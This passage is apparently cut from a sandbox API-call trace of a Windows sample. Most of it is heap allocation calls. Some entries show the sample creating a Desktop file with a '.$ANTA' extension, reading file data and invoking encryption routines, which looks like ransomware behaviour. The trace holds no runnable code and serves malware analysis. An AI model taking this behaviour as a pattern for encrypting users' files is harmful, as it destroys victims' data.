Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.429] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0125.429] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0125.429] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0125.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0125.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0125.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0125.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0125.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0125.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0125.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392148 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0125.432] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0125.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0125.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0125.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0125.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.433] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\oifah-1_nryv.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0125.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0125.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0125.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0125.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.434] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0125.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0125.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0125.434] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0125.434] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0125.434] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0125.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0125.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b88020 [0125.439] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0125.439] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0xdbcb, lpOverlapped=0x0) returned 1 [0125.442] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0125.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xdbcb) returned 0x49aa010 [0125.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b88020 | out: hHeap=0x1780000) returned 1 [0125.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0125.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0125.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xdbcb) returned 0x49b7be8 [0125.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.446] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xdbcb) returned 0x49aa010 [0125.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0125.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.446] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0125.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0125.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0125.447] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0125.447] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0125.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0125.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xdbcb) returned 0x49aa010 [0125.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0125.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xdbcb) returned 0x49c57c0 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0125.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.449] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0125.449] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0125.450] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0125.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0125.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0125.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0125.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 